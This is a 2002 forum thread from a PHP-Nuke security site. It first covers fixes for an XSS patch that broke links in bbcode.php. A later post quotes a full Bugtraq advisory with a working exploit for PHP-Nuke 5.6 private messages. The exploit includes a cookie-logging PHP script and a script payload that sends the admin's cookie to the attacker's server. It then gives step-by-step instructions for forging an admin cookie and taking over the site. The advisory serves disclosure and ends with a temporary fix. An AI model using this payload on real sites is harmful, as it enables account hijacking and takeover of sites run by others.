| View previous topic :: View next topic |
| Author |
Message |
taniself
Cadet
Joined: Jun 19, 2002
Posts: 2
Location: Taiwan
|
 Posted: Thu Jun 20, 2002 3:50 am Post subject: About XSS Exploit Patch |
|
|
Hail
I just installed this patch on my test pc,and found a issue in phpbb2 port.
EX:
When a post is written an url address without bbcode,It shows:
\
�://www.computercops.biz/downloads/PHPNuke/xss_patch_100.txt
But content correct clickable link.Before patch,it show this normally:
 /downloads/PHPNuke/xss_patch_100.txt
Thanks.
|
|
| Back to top |
|
 |
Paul
CastleCops Founder
Joined: Feb 22, 2002
Posts: 27351
|
| Posted: Thu Jun 20, 2002 3:59 am Post subject: |
|
|
That's odd... this forum has the XSS exploit patch applied and it seems the link is linked correctly. I think I'm not understanding your post. Please advise... because if there is something wrong with the forums patch, I'll fix it rightaway and re-release.
_________________
Paul Laudanski - http://www.laudanski.com
http://www.linkedin.com/pub/1/49a/17b
|
|
| Back to top |
|
|
taniself
Cadet
Joined: Jun 19, 2002
Posts: 2
Location: Taiwan
|
| Posted: Thu Jun 20, 2002 4:46 am Post subject: |
|
|
Sorry,it is my mistake.><
I use the broken line,because the code is too long,so I didn't notice that.
Thanks for reply,I should now know how to fix this problem. 
P.S
And sorry my poor English.
|
|
| Back to top |
|
|
Paul
CastleCops Founder
Joined: Feb 22, 2002
Posts: 27351
|
|
| Back to top |
|
|
Andi
Guest
IP: 209.226.*.*
|
| Posted: Fri Jul 05, 2002 8:33 pm Post subject: |
|
|
I had this problem too. I just discovered it today when I received a nice handful of 404 messages e-mailed my way: http://www.mysite.com/h<br%20/>ttp://www.thesitetheywerelinkingto.com
I've fixed it by making sure the code didn't break up the links & mailto parts up.
btw - thanks for the security fix 
|
|
| Back to top |
|
|
Paul
CastleCops Founder
Joined: Feb 22, 2002
Posts: 27351
|
|
| Back to top |
|
|
Andi
Guest
IP: 216.209.*.*
|
| Posted: Fri Jul 05, 2002 11:33 pm Post subject: |
|
|
No, that was just an example of how the link looked w/the added br tag & my site url before it. Someone added an url (without the http:// part) to their post..... and that is how it ended up!
It was easy to fix & all links work now.
thanks,
Andi
|
|
| Back to top |
|
|
Paul
CastleCops Founder
Joined: Feb 22, 2002
Posts: 27351
|
|
| Back to top |
|
|
Andi
Guest
IP: 216.209.*.*
|
| Posted: Sat Jul 06, 2002 12:51 am Post subject: |
|
|
Paul, I'm just going to copy & paste segments of the relevant parts from xss_patch_100.txt that were giving me problems & what I did to fix them.
$ret = preg_replace("#([\n ])([a-z]+?)://([^\t <\"\n\r]+)#i", "\\1<a href=\"\\2://\\3\" target=\"_blank\">\
\2://\\3</a>", $ret);
You will notice in the code above that the \2... part is separated from the rest of the code. This happens 3 times, so
this segment:
"\\1<a href=\"\\2://\\3\" target=\"_blank\">\
\2://\\3</a>"
I changed to:
"\\1<a href=\"\\2://\\3\" target=\"_blank\">\\2://\\3</a>"
Also this segment further on:
"\\1<a href=\"h
ttp://www.\\2.\\3\\4\" target=\"_blank\">www.\\2.\\3\\4</a>"
I changed to:
"\\1<a href=\"http://www.\\2.\\3\\4\" target=\"_blank\">www.\\2.\\3\\4</a>"
And finally, this:
"\\1<a href=\"mailto:\\2@\
\3\">\\2@\\3</a>"
I changed to:
"\\1<a href=\"mailto:\\2@\\3\">\\2@\\3</a>"
I just made sure that all the lines of code in bbcode.php concerning "a href" weren't broken up & that has fixed it for me. Using nuke 5.5 & phpbb2 port 2.0.4.
No idea why it was causing problems for me but this is what fixed it for my board.
HTH,
Andi
|
|
| Back to top |
|
|
Paul
CastleCops Founder
Joined: Feb 22, 2002
Posts: 27351
|
|
| Back to top |
|
|
sixonetonoffun
Private
Joined: Jun 04, 2002
Posts: 43
Location: USA
|
| Posted: Thu Aug 15, 2002 5:39 pm Post subject: PHP-Nuke v5.6 - Users can compromise admin accts |
|
|
Imagine this "Breaking News" should be posted for fun... personally I disabled PM's in Nuke way back.
| Code: |
From: delusi0n@bellsouth.net (<-delusion->)
To: bugtraq@securityfocus.com, webappsec@secuirtyfocus.com
Tested on PHP-Nuke v5.6 with Mozilla on Linux
(should work on past versions and on most browsers)
Impact:
---------------------------------------------
Allows any user to get admin access to a PHP-Nuke site.
Summary:
----------------------------------------------
Due to a XSS flaw in PHPNuke's Private Messaging module, users can send
messages
with html code that will be executed without any filtering. In old PHPNuke
versions
XSS allowed theft of cookies which stored passwords in base64
encoding. Well PHPNuke version 5.6 encrypts the passwds in md5 before it
encodes it
into base64 and puts it into a cookie. This made stolen cookies useless if
the attacker just
tried decoding the base64 encrypted pass, because he just got the MD5
encrypted pass.
Since PHP Nuke encrypts passes in md5 and then matches the encrypted pass
with the
encrypted one in the database, i was able to use the md5 encrypted pass i
got from the
stolen cookie to authenticate myself.
PHPNuke sets cookies by base64 encoding a string that looks like this:
username:md5_encrypted_pass:lang
Since i can get the md5_encrypted pass all i have to do is launch a script
that base64 encodes
a string like the one above, and sets it as a cookie on my box.
Exploit:
-------------------------------------------------
For this exploit to work, you must create the following files in your web
server's directory.
cookie.php containing this:
<?
$fp = fopen("cookie.txt","a");
fputs($fp, $cookie);
fclose($fp);
print "Message Not Found!"; /* this is so the admin doesnt get scared. and
thinks its some bug. */
?>
test.php containing:
<?
$admin = base64_encode("decoded_string") ;
setcookie("admin","$admin",time()+2592000);
?>
You will find out what to replace decoded_string with..
1. Send an appealing private message to admin containing
<script>document.location.replace('http://yourserver/cookie.php?cookie='+doc
ument.cookie);</script>
2. Wait awhile until the admin checks the message then check cookie.txt on
yer server.
3. From cookie.txt.. copy the encrypted text after admin= and before the ;
4. go to http://www.isecurelabs.com/base64.php paste the copied text, click
decode it should give u a string like this:
username:md5_encrypted_passwd:language (language may be blank).
5. paste the decoded string into test.php like so.
<?
$admin = base64_encode("paste decoded string here");
setcookie("admin","$admin",time()+2592000);
?>
6. Login as any user on the site
7. send private message to self containing:
<iframe src="http://yerserver/test.php"></iframe>
Open the message and a cookie will now be set on yer box, but it will be
configured with your server's URL.
So all u gotta do is replace yer url wit the nuked site.
8. for mozilla edit cookies.txt in yer ~/.mozilla/someprofile/something/
directory replace the url of yer server to the nuked site,
for other browsers just find the Cookie from your server and edit it so
instead of showng your url it shows the url
of the nuked site.
9. restart yer browser (close and open up again). go back into the nuked
site and you are now admin. :D
Temp Solution:
-------------------------------------------------
Edit reply.php in /modules/Private_Messages/ and make $message be stripped
of html tags.
Go to line 75 in reply.php and add this line:
$message = strip_tags($message, '
');That will remove any html tags that arent
or . So it willprevent the XSS.-------------------------------------------------NOTE: I wasnt able to contact the php nuke person, i couldnt find an emailon their site, and when i signed up for membership i never got the password,so if u can, let them know asap so they can fix this.Another Vulnerability Brought to you by,delusionhttp://digital-delusions.dyn.ee
|
|
|
| Back to top |
|
|
IP: 65.168.*.*
Guest
|
| Posted: Thu Aug 15, 2002 8:18 pm Post subject: |
|
|
Nuke 5.6 contains Splatt forums for Private Messaging.
|
|
| Back to top |
|
|
sixonetonoffun
Private
Joined: Jun 04, 2002
Posts: 43
Location: USA
|
| Posted: Fri Aug 16, 2002 1:49 am Post subject: |
|
|
At any rate doesn't really seem like anything new to me.
|
|
| Back to top |
|
|
Paul
CastleCops Founder
Joined: Feb 22, 2002
Posts: 27351
|
|
| Back to top |
|
|
sixonetonoffun
Private
Joined: Jun 04, 2002
Posts: 43
Location: USA
|
| Posted: Fri Aug 16, 2002 3:15 am Post subject: |
|
|
Figured it went along with the general topic better then posting a new one.
Maybe it stirs up some interest in nuke security? They seem to be running through the Blogs and shopping carts lately.
|
|
| Back to top |
|
|
|
|
Forum FAQ
Search
Usergroups
Profile
Login to check your private messages
Login
